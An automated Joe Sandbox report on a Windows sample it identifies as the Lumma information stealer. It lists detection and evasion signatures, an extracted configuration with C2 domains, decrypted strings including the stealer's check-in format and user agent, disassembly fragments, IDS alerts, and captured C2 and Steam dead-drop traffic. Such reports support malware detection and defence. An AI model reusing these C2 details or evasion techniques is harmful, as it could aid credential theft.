Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1529340
MD5:a322b061da9d5ab15e043189a6931bc2
SHA1:4e81ba25e41d103b329916270e66175c1fc8e0ba
SHA256:a4f696da6fd8904713eb22b46113d21d886604dd8bd280a3808833cfade0100b
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A322B061DA9D5AB15E043189A6931BC2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["licendfilteo.sitec", "spirittunek.storec", "studennotediw.storec", "dissapoiznw.storec", "clearancek.site", "bathdoomgaz.storec", "eaglepawnoy.storec", "mobbipenju.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:35.148948+020020546531A Network Trojan was detected192.168.2.649718104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:35.148948+020020498361A Network Trojan was detected192.168.2.649718104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:15.817688+020020564771Domain Observed Used for C2 Detected192.168.2.6548641.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:15.720095+020020564711Domain Observed Used for C2 Detected192.168.2.6536421.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:15.759413+020020564811Domain Observed Used for C2 Detected192.168.2.6505261.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:15.749691+020020564831Domain Observed Used for C2 Detected192.168.2.6583491.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:15.845308+020020564731Domain Observed Used for C2 Detected192.168.2.6566611.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:15.735409+020020564851Domain Observed Used for C2 Detected192.168.2.6575021.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:15.833548+020020564751Domain Observed Used for C2 Detected192.168.2.6579521.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T21:42:15.798501+020020564791Domain Observed Used for C2 Detected192.168.2.6593821.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.6412.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.sitec", "spirittunek.storec", "studennotediw.storec", "dissapoiznw.storec", "clearancek.site", "bathdoomgaz.storec", "eaglepawnoy.storec", "mobbipenju.store"], "Build id": "4SD0y4--legendaryy"}
    Multi AV Scanner detection for submitted file
    Source: file.exeReversingLabs: Detection: 39%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.stor
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.stor
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.stor
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.stor
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.stor
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.stor
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B450FA
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B0D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B0D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_00B463B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00B499D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h0_2_00B4695B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_00B0FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00B10EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00B46094
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec ebx0_2_00B3F030
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00B16F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [edx]0_2_00B01000
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00B44040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_00B2D1E1
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00B142FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00B22260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], ax0_2_00B22260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_00B323E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_00B323E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_00B323E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00B323E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_00B323E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+14h]0_2_00B323E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_00B0A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_00B464B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_00B1B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_00B2E40C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_00B2C470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B1D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]0_2_00B41440
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]0_2_00B08590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00B16536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh0_2_00B47520
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B29510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_00B2E66A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00B3B650
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_00B2D7AF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_00B467EF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]0_2_00B47710
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B45700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00B228E9
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_00B049A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_00B43920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_00B1D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00B11ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00B11A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00B05A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00B44A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00B30B80
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00B13BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00B11BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00B49B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+000006B8h]0_2_00B1DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h0_2_00B1DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00B2AC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], ax0_2_00B2AC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B49CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_00B49CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_00B2CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B2CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_00B2CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh0_2_00B3FC20
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_00B27C00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h0_2_00B2EC48
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B48D8A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_00B2DD29
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_00B2FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_00B0BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00B16EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00B06EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00B11E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, ecx0_2_00B14E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B25E70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00B27E60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [ecx]0_2_00B2AE57
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00B16F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00B08FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00B45FD6
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], 0000h0_2_00B1FFDF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h0_2_00B47FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B47FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00B3FF70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00B29F62

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:50526 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:58349 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:54864 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:56661 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:57952 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:53642 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:59382 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:57502 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49718 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49718 -> 104.21.53.8:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: licendfilteo.sitec
    Source: Malware configuration extractorURLs: spirittunek.storec
    Source: Malware configuration extractorURLs: studennotediw.storec
    Source: Malware configuration extractorURLs: dissapoiznw.storec
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: bathdoomgaz.storec
    Source: Malware configuration extractorURLs: eaglepawnoy.storec
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000000.00000003.2237029874.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=be0686778f7a7e66d6036359; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 08 Oct 2024 19:42:16 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control= equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000000.00000003.2237080078.000000000133C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2237029874.000000000130E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros0
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.2417153902.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.0000000001346000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2446309521.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236996064.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
